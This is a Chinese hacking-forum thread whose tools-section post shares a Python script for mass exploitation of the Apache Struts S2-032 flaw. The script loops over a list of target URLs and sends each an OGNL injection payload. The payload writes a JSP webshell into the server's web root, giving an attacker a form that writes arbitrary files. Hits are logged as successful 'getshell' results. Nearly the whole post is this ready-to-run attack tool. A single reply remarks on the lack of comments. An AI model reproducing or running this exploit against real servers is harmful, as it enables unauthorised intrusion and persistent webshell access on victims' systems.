查看: 11567|回复: 1

[工具专区] S2-032批量getshell根目录生成小马

[复制链接]
  • TA的每日心情
    慵懒
    2022-4-16 15:45
  • 签到天数: 247 天

    [LV.8]以坛为家I

    发表于 2016-4-26 20:44:38 | 显示全部楼层 |阅读模式
    Struts S2-032

    [Python] 纯文本查看 复制代码
    #!/usr/bin/env python
    # -*- coding: utf-8 -*-
    # @Author: Lcy
    # @Date:   2016-04-26 17:38:52
    # @Last Modified by:   Lcy
    # @Last Modified time: 2016-04-26 18:20:45
    import requests
    import sys
    if len(sys.argv) < 2:
        print "Example: python exp.py list.txt"
        exit()
    weblist = sys.argv[1]
    payload = "?method:%23_memberAccess%[email]3d@ognl.OgnlContext[/email]@DEFAULT_MEMBER_ACCESS,%23a%3d%23parameters.reqobj[0],%23c%3d%23parameters.reqobj[1],%23req%3d%23context.get(%23a),%23b%3d%23req.getRealPath(%23c)%2b%23parameters.reqobj[2],%23fos%3dnew java.io.FileOutputStream(%23b),%23fos.write(%23parameters.content[0].getBytes()),%23fos.close(),%23hh%3d%23context.get(%23parameters.rpsobj[0]),%23hh.getWriter().println(%23b),%23hh.getWriter().flush(),%23hh.getWriter().close(),1?%23xx:%23request.toString&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&reqobj=%2f&reqobj=lcy.jsp&content=%3C%25@%20page%20language%3D%22java%22%20pageEncoding%3D%22gbk%22%25%3E%3Cjsp%3Adirective.page%20import%3D%22java.io.File%22%2f%3E%3Cjsp%3Adirective.page%20import%3D%22java.io.OutputStream%22%2f%3E%3Cjsp%3Adirective.page%20import%3D%22java.io.FileOutputStream%22%2f%3E%3C%25%20int%20i%3D0%3BString%20method%3Drequest.getParameter%28%22act%22%29%3Bif%28method%21%3Dnull%26%26method.equals%28%22yoco%22%29%29%7BString%20url%3Drequest.getParameter%28%22url%22%29%3BString%20text%3Drequest.getParameter%28%22smart%22%29%3BFile%20f%3Dnew%20File%28url%29%3Bif%28f.exists%28%29%29%7Bf.delete%28%29%3B%7Dtry%7BOutputStream%20o%3Dnew%20FileOutputStream%28f%29%3Bo.write%28text.getBytes%28%29%29%3Bo.close%28%29%3B%7Dcatch%28Exception%20e%29%7Bi%2b%2b%3B%25%3E0%3C%25%7D%7Dif%28i%3D%3D0%29%7B%25%3E1%3C%25%7D%25%3E%3Cform%20action%3D%27%3Fact%3Dyoco%27%20method%3D%27post%27%3E%3Cinput%20size%3D%22100%22%20value%3D%22%3C%25%3Dapplication.getRealPath%28%22%2f%22%29%20%25%3E%22%20name%3D%22url%22%3E%3Cbr%3E%3Ctextarea%20rows%3D%2220%22%20cols%3D%2280%22%20name%3D%22smart%22%3E"
    f = open(weblist)
    for l in f.readlines():
        url = l.strip()  + payload
        try:
            r = requests.get(url,timeout=5)
            res = r.text
            if "lcy.jsp" in res:
                f = open("result.txt","a")
                f.write(l.strip()  + payload + "\r\n\r\n")
                print "\n %s Getshell Success!" % l.strip(),
        except:
            pass
    回复

    使用道具 举报

  • TA的每日心情
    奋斗
    2019-9-24 17:13
  • 签到天数: 187 天

    [LV.7]常住居民III

    发表于 2016-4-27 08:59:35 | 显示全部楼层
    居然我是沙发,没人评论
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-12-23 21:05 , Processed in 0.034955 second(s), 13 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部